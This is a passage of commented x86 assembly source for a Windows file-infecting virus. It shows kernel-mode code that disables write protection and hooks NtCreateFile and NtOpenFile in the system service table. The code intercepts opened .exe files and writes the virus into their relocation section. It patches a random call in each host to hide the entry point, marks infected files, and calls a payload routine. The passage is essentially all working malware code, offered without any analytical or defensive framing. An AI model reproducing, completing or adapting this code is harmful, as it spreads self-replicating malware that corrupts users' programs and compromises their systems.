callz FreeLibrarys ;free librarys loaded.
or ebp,ebp ;first generation exit, ExitProcess.
jnz gen2Exit
push 0
call ExitProcess
gen2Exit:
mov eax,[ebp + EntryPoint]
mov dword ptr [ebp + dirHook],eax
popfd
popad
push 12345678h
dirHook equ $-4
ret
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
SysAlreadyInfected:
lea esi,[ebp + win32kfuck]
push esi
mov eax,[ebp + NtKernel] ;deleting win32k.fuck if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
jmpz Exit
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry Point Of Virus when is executed in ring0.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
EPointSystem: ;Ring0 Code
;;;;;;;;;;;;;
push 00000000h ;This space in stack will be filled with the entry point
;address of win32k.sys
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz R0_Doff ;i calculate delta offset.
R0_Doff:
pop ebp
sub ebp,offset R0_Doff
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + EPointSystem] ;our target is to search image base of win32k.sys in memory.
xor ax,ax ;hardcoded would be 0A0000000h in my system.
add eax,1000h
SearchBaseImage:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchBaseImage
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + EntryPointWin32ksys] ;We have the old entry point and the image base
add ebx,eax ;so we have the entry point address. We put
mov [esp + cPushad + cPushfd],ebx ;that entry point after pushad and pushfd bytes
;;;;;;;;;;;;;;;;;;;;;;;; ;in stack for using ret instruction later and
;for jumping entry point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function
xor ax,ax ;ExCreateCallback).With this address we will get
add eax,1000h ;ntoskrnl base addr
;eax -> a part of ntoskrnl
SearchNtoskrnl:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchNtoskrnl
;eax -> base of ntoskrnl
mov [ebp + Ntoskrnl],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address,
;syscall number of NtCreateFile, ....
;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable,
;and this entry is the key for accessing the system service dispatch table where we must
;patch for hooking a service(NtCreateFile for example ;)
;KeServiceDescriptorTable points to a structure like this:
; {
; DWORD ServiceTableBase - pointer to system service dispatch table(SSDT)
; DWORD ServiceCounterTable - not important for us
; DWORD NumberOfServices - number of services in system service dispatch table
; DWORD ParamTableBase - pointer to system service parameter table(SSPT)
; }
;
;We want to get the number of the NtCreateFile service and then we search in this table
;and we patch the address of NtCreateFile rutine with a address of our code
;;;;;;;;;;;;;;;;;;;;;;;;
;eax = ntoskrnl base
GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen
mov [ebp + KeServiceDescriptorTable],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;ill get SSDT from that service descriptor table
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[eax]
mov [ebp + SSDT],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill get from ntoskrnl the addr of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtCreateFileCRC,NCFNameLen
mov [ebp + NtCreateFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get service ID from ZwCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwCreateFileCRC,ZCFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtCreateFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;
;and with NtOpenFile same thing
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtOpenFileCRC,NOFNameLen
mov [ebp + NtOpenFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get service ID from ZwOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwOpenFileCRC,ZOFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtOpenFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;
;We hook NtCreateFile and NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,cr0 ;we set write protect flag to 1, and in this
push eax ;supervision of writing readonly mem is disabled
or eax,00010000h ;We do this for writing SSDT coz is possible (under
mov cr0,eax ;XP is default) SSDT is read only.
;(Thx Ratter ;)
;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;Note in the next inst we get the service ID of NtCreateFile and NtOpenFile from Zws funcions
;of them. I got it searching NtCreateFile and NtOpenFile in ntoskrnl and scanning SSDT
;comparing with entrys and when is the same value that is the entry.Ratter said me the problem
;of this: NtOpenFile or NtCreateFile could be previosly hooked and with this method this
;will not work( Thx again Ratter :)
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtCreateFileEntryAddr]
lea eax,[ebp + NtCreateFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtOpenFileEntryAddr]
lea eax,[ebp + NtOpenFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
pop eax ;we restore WP flag to original value
mov cr0,eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz GetApisRing0 ;ill get some apis for no calling all time GezApi
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz DeleteWin32ksy ;i must delete win32k.sy if still not deleted
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz PayloadRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
ReturnWin32ksys:
popad
popfd
ret ;previosly i moved entry point adress of win32k.sys at position in stack
;so this ret will fill eip with start point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
NtOpenFileHookRutine:
;;;;;;;;;;;;;;;;;;;;;
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookOF ;delta offset
doff_hookOF:
pop ebp
sub ebp,offset doff_hookOF
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtOpenFileAddr]
mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;NTSTATUS NtOpenFile(
; OUT PHANDLE FileHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes,
; OUT PIO_STATUS_BLOCK IoStatusBlock,
; IN ULONG ShareAccess,
; IN ULONG OpenOptions
; );
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
NtCreateFileHookRutine:
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookCF ;delta offset
doff_hookCF:
pop ebp
sub ebp,offset doff_hookCF
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtCreateFileAddr]
mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;NTSTATUS NtCreateFile(
; OUT PHANDLE FileHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes,
; OUT PIO_STATUS_BLOCK IoStatusBlock,
; IN PLARGE_INTEGER AllocationSize OPTIONAL,
; IN ULONG FileAttributes,
; IN ULONG ShareAccess,
; IN ULONG CreateDisposition,
; IN ULONG CreateOptions,
; IN ULONG EaBuffer OPTIONAL,
; IN ULONG EaLength
; );
;
;this only for NtCreateFile:
;;;;;;;;;;;;;;;;;;;;;;;;
;i get some datas from parameters
mov eax,[esp + cPushad + cPushfd + 4 + 14h]
mov [ebp + AttributesFileRing0],eax ;i get the attributes of file
mov eax,[esp + cPushad + cPushfd + 4 + 1ch]
mov [ebp + CreateDispositionFileRing0],eax ;i get manner for opening the file
mov eax,[esp + cPushad + cPushfd + 4 + 20h]
mov [ebp + CreateOptionsFileRing0],eax ;i get some more flags relative
;;;;;;;;;;;;;;;;;;;;;;;; ;to manner of opening the file
;;;;;;;;;;;;;;;;;;;;;;;;
;I want a existing file non directory
test dword ptr [ebp + CreateDispositionFileRing0],FILE_OPEN
jz StopInfectionRing0
;test dword ptr [ebp + CreateOptionsFileRing0],FILE_NON_DIRECTORY_FILE
;jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GeneralCodeForInfectionRing0:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz UnhookWhile ;ill unhook apis while hooking rutine coz for example
;;;;;;;;;;;;;;;;;;;;;;;; ;if we call ZwOpenFile we will go to a infinite loop
;OBJECT_ATTRIBUTES {
; ULONG Length;
; PUNICODE_STRING ObjectName;
; HANDLE RootDirectory;
; PSECURITY_DESCRIPTOR SecurityDescriptor;
; PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
; ULONG Attributes;
; }
;
;UNICODE_STRING {
; USHORT Length; ;len in bytes of Buffer
; USHORT MaximumLength;
; PWSTR Buffer;
; }
;note if RootDirectory parameter is null,ObjectName has a fully qualified file specification,
;path+name,but if RootDirectory is non null,then ObjectName has only the name of the object
;relative to RootDirectory directory.
;when we call NtOpenFile we must use both RootDirectory and ObjectName.
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get the file name of the file i want to infect
mov edi,[esp + cPushad + cPushfd + 4 + 8] ;edi -> ObjectAttributes
mov eax,[edi + 4] ;eax = RootDirectory
mov [ebp + RootDirectoryRing0],eax
mov esi,[edi + 8] ;esi -> unicode string of the name
mov eax,[esi]
mov dword ptr [ebp + FileNameRing0],eax
lea edi,[ebp + StringRing0] ;edi -> our buffer for unicode string of name
mov dword ptr [ebp + FileNameRing0 + 4],edi
movzx ecx,word ptr [esi] ;ecx = long of unicode string
mov esi,[esi + 4]
rep movsb ;i copy the buffer
;;;;;;;;;;;;;;;;;;;;;;;;
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv |quitar esto| vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
movzx ecx,word ptr [ebp + FileNameRing0]
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |quitar esto| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;;;;;;;;;;;;;;;;;;;;;;;;
movzx ecx,word ptr [ebp + FileNameRing0] ;I test if file is a .exe file
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz MapFileRing0 ;map the file for infection ;)
or eax,eax
jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,eax
;ebx = Base of Mapped File
cmp word ptr [ebx],'ZM'
jne CloseAndStopInfectionRing0
mov edi,[ebx + 3ch]
add edi,ebx
;edi -> PE
cmp word ptr [edi],'EP'
jne CloseAndStopInfectionRing0
cmp word ptr [edi + 8],'zs'
je CloseAndStopInfectionRing0 ;is it already infected?
mov ax,word ptr [edi + 16h]
test ax,00000002h ;yes IMAGE_FILE_EXECUTABLE_IMAGE
je CloseAndStopInfectionRing0
test ax,00001000h ;no IMAGE_FILE_SYSTEM
jne CloseAndStopInfectionRing0
test ax,00002000h ;no IMAGE_FILE_DLL
jne CloseAndStopInfectionRing0
mov ax,[edi + 5ch]
test ax,00000001h ;no IMAGE_SUBSYSTEM_NATIVE
jne CloseAndStopInfectionRing0
;ebx->MZ
;edi->PE
;;;;;;;;;;;;;;;;;;;;;;;;
;we will search EPoint of file
mov edx,[edi + 28h]
;edx = RVA epoint,we need the pointer to raw data
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
inc ecx
GoToSectionEPointInfectionRing0:
dec ecx
or ecx,ecx
jz CloseAndStopInfectionRing0
add eax,28h
cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx
jnle GoToSectionEPointInfectionRing0
mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress]
add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
cmp edx,esi
jnl GoToSectionEPointInfectionRing0
;eax->.text section header
mov dword ptr [ebp + textSecHeader],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will search relocs section
mov edx,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress]
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
inc ecx
GoToSectionRelocInfectionRing0:
dec ecx
or ecx,ecx
jz CloseAndStopInfectionRing0
add eax,28h
cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx
jnle GoToSectionRelocInfectionRing0
mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress]
add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
cmp edx,esi
jnl GoToSectionRelocInfectionRing0
;eax->.reloc section header
mov dword ptr [ebp + relocSecHeader],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;ebx->MZ
;edi->PE
mov [ebp + HostMZ],ebx
mov [ebp + HostPE],edi
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;Getting a offset for the virus
mov eax,[eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
push eax
call randRing0
;eax = rand value 0...(size of reloc section)/2
pop edx
sub edx,eax ;edx = size for vx
cmp edx,tamvirus
jb CloseAndStopInfectionRing0
mov edx,[ebp + relocSecHeader]
mov edx,[edx.IMAGE_SECTION_HEADER.SH_PointerToRawData]
add edx,eax
mov [ebp + OffsetVirus],edx ;we will put the virus in reloc section + rand value
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;Getting RVA virus
mov ebx,[ebp + relocSecHeader]
mov edx,[ebx.IMAGE_SECTION_HEADER.SH_PointerToRawData]
mov eax,[ebx.IMAGE_SECTION_HEADER.SH_VirtualAddress]
sub eax,edx
mov edx,[ebp + OffsetVirus]
add edx,eax
mov [ebp + RVAVirus],edx
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;Erasing RVA and size in data directory for relocs
mov edi,[ebp + HostPE]
mov dword ptr [edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress],00000000h
mov dword ptr [edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_Size],00000000h
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + textSecHeader]
mov edx,[eax.IMAGE_SECTION_HEADER.SH_PointerToRawData]
push edx
mov eax,[eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
add edx,eax
add edx,dword ptr [ebp + HostMZ]
mov [ebp + TextSecEnd],edx
call randRing0
pop edx
;edx = PointerToRawData Text Section
;eax = rand value 0...SizeOfRawData/2
add edx,eax
add edx,dword ptr [ebp + HostMZ]
;;;;;;;;;;;;;;;;;;;;;;;;
;Super's Theory:
;
; When u jump a random number of bytes in a buffer of code its possible u will
; jump to a zone between instruction. For example: E8 11 22 33 44 its possible
; in a random jump you will stay pointing 11 or 22 instead instruction opcode E8.
; but its possible redrive ur pointer to opcodes doing a route over the code
; getting instruction lengths and adding them to your pointer, 16 times at max.
; Then u will be in opcodes sure.
;edx = pointer
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + tbl]
push eax
call disasm_init
pop eax;clean stack
RedrivePointer:
inc edx
mov eax,dword ptr [ebp + TextSecEnd]
sub eax,50
cmp eax,edx
jl CloseAndStopInfectionRing0
mov ecx,16
goodInsContinue:
push edx
lea eax,[ebp + tbl]
push eax
call disasm_main
pop esi
pop esi
add edx,eax
or eax,eax
jz RedrivePointer
mov eax,dword ptr [ebp + TextSecEnd]
sub eax,50
cmp eax,edx
jl CloseAndStopInfectionRing0
loop goodInsContinue
;;;;;;;;;;;;;;;;;;;;;;;;
;well,if all was as we want,we are pointing to a good opcode
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,edx
call SearchCall
or eax,eax
jz CloseAndStopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;ebx -> E8 XX XX XX XX
;the VA of the call is ebx + 5 + (XX XX XX XX)
mov edx,[ebp + textSecHeader]
mov eax,[edx.IMAGE_SECTION_HEADER.SH_VirtualAddress]
sub eax,[edx.IMAGE_SECTION_HEADER.SH_PointerToRawData]
add eax,ebx
sub eax,[ebp + HostMZ]
;eax RVA of E8 XX XX XX XX
push eax
add eax,[ebx + 1]
add eax,5
;eax = RVA of call pointing addr
;we will put in EntryPoint variable the VA of the call. When ring3 part of virus returned
;to host it will jmp to the content of this variable.
mov edi,[ebp + HostPE]
add eax,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_ImageBase]
;eax=VA of call pointing addr
mov [ebp + EntryPoint],eax
pop eax
;eax RVA of E8 XX XX XX XX
mov edx,[ebp + RVAVirus]
add eax,5
sub edx,eax
;we patch the call for pointing our code
mov [ebx+1],edx
;if all well,the call is calling the virus,and the virus will pass the control where the
;call was calling before patching...EPO
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;the virus will be writed in the host,at offset = OffsetVirus
;we must search a call for patching with a call to virus
mov edx,[ebp + HostMZ] ;MZ
mov ebx,[ebp + HostPE] ;PE
mov edi,edx
add edi,[ebp + OffsetVirus]
lea esi,[ebp + svirus]
mov ecx,tamvirus
rep movsb
mov word ptr [ebx + 8],'zs'
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
CloseAndStopInfectionRing0: ;close and bye
callz CloseAllRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
StopInfectionRing0:
callz RehookAgain
popad
popfd
push 12345678h
HookRealAddr = dword ptr $ - 4
ret
;;;;;;;;;;;;;;;;;;;;;;;;
textSecHeader dd 0
relocSecHeader dd 0
relocRVA dd 0
OffsetVirus dd 0
HostMZ dd 0
HostPE dd 0
RVAVirus dd 0
TextSecEnd dd 0
;;;;;;;;;;;;;;;;;;;;;;;;
;randRing0: this funcion will generate a ramdom number gived a size
;parameters:
; eax = size The number will be generated 0...size
randRing0:
push eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,KeQueryTickCountCRC,KQTCNameLen
lea ebx,[ebp + randvalue]
push ebx
call eax
mov edx,[ebp + randvalue]
pop eax
;eax = size
;edx = TickCount
and edx,000000FFh
mov ecx,edx
shl ecx,8
or edx,ecx
mov ecx,edx
shl ecx,16
or edx,ecx
and edx,eax
cmp edx,eax
jg randRing0
mov eax,edx
shr eax,1
ret
randvalue dd 0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;randRing3: this funcion will generate a ramdom number gived a size
;parameters:
; eax = size The number will be generated 0...size
randRing3:
push eax
mov eax,[ebp + NtKernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
mov edx,eax
pop eax
;eax = size
;edx = TickCount
and edx,000000FFh
mov ecx,edx
shl ecx,8
or edx,ecx
mov ecx,edx
shl ecx,16
or edx,ecx
and edx,eax
cmp edx,eax
jg randRing3
mov eax,edx
shr eax,1
ret
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;SECOND VERSION IMPROVEMENT: we will add zombie length disassembler engine for getting
;a good EPO infection :D (thx z0mbie...we didnt say u if we could to use your lde but
;we thought this is a good purpose so you would be agree ;)
include lde32bin.inc ; LDE32 code
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;SearchCall: this function will search a call instruction given a buffer with code.
;in:ebx->buffer with code
;
;The function will return eax = 0 if error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
SearchCall:
lea esi,[ebp + tbl]
push esi
call disasm_init
pop esi;clean stack
xor eax,eax
LoopSearchCall:
inc eax
or eax,eax
jz FoundCall
cmp byte ptr [ebx],0E8h
je FoundCall
push ebx
lea esi,[ebp + tbl]
push esi
call disasm_main
pop esi
pop esi
add ebx,eax
jmp LoopSearchCall
FoundCall:
ret
tbl db 2048 dup (?)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;CRC32 rutine(from Billy Belcebu tutorial)...i have not said him nothing about i have take
;his rutine but i dont know him...in addition i have seen this rutine in other viruses
;so i think he doesnt go angry if i use it :)
;
;in:esi -> start of buffer
; edi = size of buffer
;out:
; eax = cksum
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;GetApi gets a api address from its crc.
;in:
; eax -> base of dll
; edx = the crc32 of api to search.
; ebx = api name len.
;out:
; eax -> function
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetApi:
;eax -> base of dll
;ebx = len api name
;edx = crc of api name
push ebx ecx edx esi edi
push eax
mov eax,[eax + 3ch]
add eax,dword ptr [esp]
;eax -> PE
mov eax,[eax + 78h]
add eax,dword ptr [esp]
;eax -> Export table
push eax
push ebx
mov ebx,[eax + 20h]
add ebx,dword ptr [esp + 8]
;ebx -> Name of functions
push ebx
sub ebx,4
SearchApiByCRC:
add ebx,4
mov esi,[ebx]
add esi,dword ptr [esp + 12]
CalcLenString
;ecx = length api.name
mov edi,[esp + 4]
cmp edi,ecx
jne SearchApiByCRC
mov edi,ecx
push ebx
push edx
callz CRC32
pop edx
pop ebx
cmp eax,edx
jne SearchApiByCRC
pop edi
;edi -> name of functions
;ebx -> name of functions + (index of our api * 4)
sub ebx,edi
mov eax,ebx
xor edx,edx
mov ebx,4
div ebx
;eax = index of our api
pop ebx
pop ebx
;ebx -> export
mov ecx,[ebx + 24h]
add ecx,dword ptr [esp]
;ecx -> name ordinals
rol eax,1
add ecx,eax
mov ecx,[ecx]
shr ecx,10h
dec ecx
;ecx = ordinal
mov eax,[ebx + 1ch]
add eax,dword ptr [esp]
;eax -> address of functions
rol ecx,2
add eax,ecx
mov eax,[eax]
add eax,dword ptr [esp]
;eax = address of function searched
pop ebx
pop edi edi edx ecx ebx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
